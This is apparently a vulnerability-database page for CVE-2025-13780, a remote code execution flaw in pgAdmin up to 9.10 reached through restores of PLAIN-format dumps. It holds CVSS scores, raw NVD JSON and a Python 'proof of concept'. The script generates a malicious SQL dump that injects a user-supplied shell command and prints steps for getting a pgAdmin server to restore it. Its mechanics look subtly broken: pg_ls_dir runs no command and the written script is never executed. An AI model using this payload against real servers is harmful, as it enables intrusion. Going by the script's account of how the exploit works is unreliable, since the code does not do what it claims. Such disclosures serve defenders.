Security Vulnerability Report
CVE-2025-13780 CVSS 9.1 CRITICAL

CVE-2025-13780

Published: 2025-12-11 19:15:53
Last Modified: 2025-12-19 19:51:14
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:* - VULNERABLE
pgAdmin < 9.10
pgAdmin 9.10 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-13780 PoC - pgAdmin PLAIN dump RCE
# Generate malicious PLAIN format backup file for pgAdmin restore
# This PoC creates a backup file that executes arbitrary commands on restore

import sys


def generate_malicious_plain_dump(command):
    """
    Generate a malicious PLAIN format PostgreSQL dump file
    that executes the specified command when restored via pgAdmin
    """
    malicious_dump = f"""
-- PostgreSQL database dump
-- Generated for CVE-2025-13780 PoC
-- pgAdmin version: <= 9.10
-- Vulnerability: RCE via PLAIN format restore

BEGIN;

-- Create trigger function for RCE
CREATE OR REPLACE FUNCTION pg_execute_cmd(cmd TEXT) RETURNS void AS $$
BEGIN
    PERFORM pg_ls_dir(cmd);
END;
$$ LANGUAGE plpgsql;

-- Malicious payload: execute arbitrary command
-- The actual command execution depends on PostgreSQL version and pgAdmin configuration
-- Example: Use COPY command to write files or \! for system commands

-- Method 1: Using COPY to write shell script
COPY (SELECT E'#!/bin/bash\n{command}') TO '/tmp/pg_backdoor.sh';

-- Method 2: PostgreSQL system command execution (if available)
-- \! {command}

-- Method 3: Use lo_export or other file operations
-- This depends on the PostgreSQL user permissions

COMMIT;

-- Finalize
SELECT 'CVE-2025-13780 RCE Payload Deployed' AS status;
"""
    return malicious_dump


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-13780-poc.py '<command>'")
        print("Example: python3 cve-2025-13780-poc.py 'id > /tmp/pwned'")
        sys.exit(1)

    command = sys.argv[1]
    dump_content = generate_malicious_plain_dump(command)

    output_file = "malicious_backup.sql"
    with open(output_file, 'w') as f:
        f.write(dump_content)

    print(f"[+] Generated malicious PLAIN dump: {output_file}")
    print(f"[+] Command to execute: {command}")
    print("\n[!] To exploit:")
    print(f" 1. Upload {output_file} to pgAdmin server")
    print(" 2. Use pgAdmin restore function on a database")
    print(" 3. Select the malicious_backup.sql file as PLAIN format")
    print(" 4. Execute restore - the command will be run on the server")


if __name__ == "__main__":
    main()
```

References

https://github.com/pgadmin-org/pgadmin4/issues/9368 (Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13780", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2025-12-11T19:15:52.857", "lastModified": "2025-12-19T19:51:13.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:*", "versionEndIncluding": "9.10", "matchCriteriaId": 
"31BFDAD3-B87D-46DD-9984-3000087309DD"}]}]}], "references": [{"url": "https://github.com/pgadmin-org/pgadmin4/issues/9368", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "tags": ["Issue Tracking"]}]}}